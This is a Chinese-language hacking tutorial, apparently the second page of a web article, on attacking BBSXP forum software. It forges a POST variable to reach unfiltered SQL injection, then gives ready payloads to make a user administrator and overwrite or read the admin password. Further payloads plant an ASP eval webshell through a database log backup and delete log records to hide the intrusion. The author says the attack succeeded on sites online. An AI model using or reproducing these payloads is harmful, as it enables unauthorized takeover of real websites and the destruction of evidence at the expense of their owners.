变量Request.Form就是
content=test+log&UpFileID=&Category=&Subject=test+log
上面的变量都是经过HTMLEncode处理的，但是我们还是可以想办法饶过去。
我们可以伪造变量,比如我们把content=test+log&UpFileID=&Category=&Subject=test+log改为
content=test+log&UpFileID=&Category=&Subject=test+log&yl6364=love
记得修改Content-Length,打开bbsxp_log表看见POSTData为:
content=test+log&UpFileID=&Category=&Subject=test+log&yl6364=love
看出点什么来了吗嘿嘿，我们伪造的变量yl6364就这样进数据库了。因为是伪造的变量所以自然是没有经过任何的过滤。下面思路就清晰了，提升权限为管理员然后进后台查看网站的路境，再利用log备份拿webshell
提升权限:
content=test+log&UpFileID=&Category=&Subject=test+log
改为:
content=test+log&UpFileID=&Category=&Subject=test+log&yl6364=love','');update bbsxp_users set userroleid=1 where username='yl6364'--
这样就变为前台的管理员。

修改后台的密码:
update bbsxp_sitesettings set adminpassword='md5密码'--
bbsxp经过md5加密的密码字母都是大写的

获得数据库的名:
update bbsxp_users set usermail=db_name() where username='yl6364'--

log备份拿webshell:
alter database bbsxp set recovery full;drop table cmd;create table cmd (a image);backup log bbsxp to disk = 'c:\cmd' with init;insert into cmd(a) values ('<%eval request(chr(35)):response.end%>');backup log bbsxp to disk = 'C:\web\bbsxp\cmd.asp';--

修改后台密码要记得改回来哦，不然管理员就进不了后台了，所以最好弄得到管理员密码。
最后要记得擦PP,
delete * from bbsxp_log where username='yl6364'--

ps:官方论坛我测试过没有成功，不知道什么原因。不过在本地和网上测试成功!

4a5d4ec6a5f778c3bb21f257cdc89154

update bbsxp_users usermail=(select adminpassword from bbsxp_sitesettings) where username='yl6364'--

上一页  [1] [2]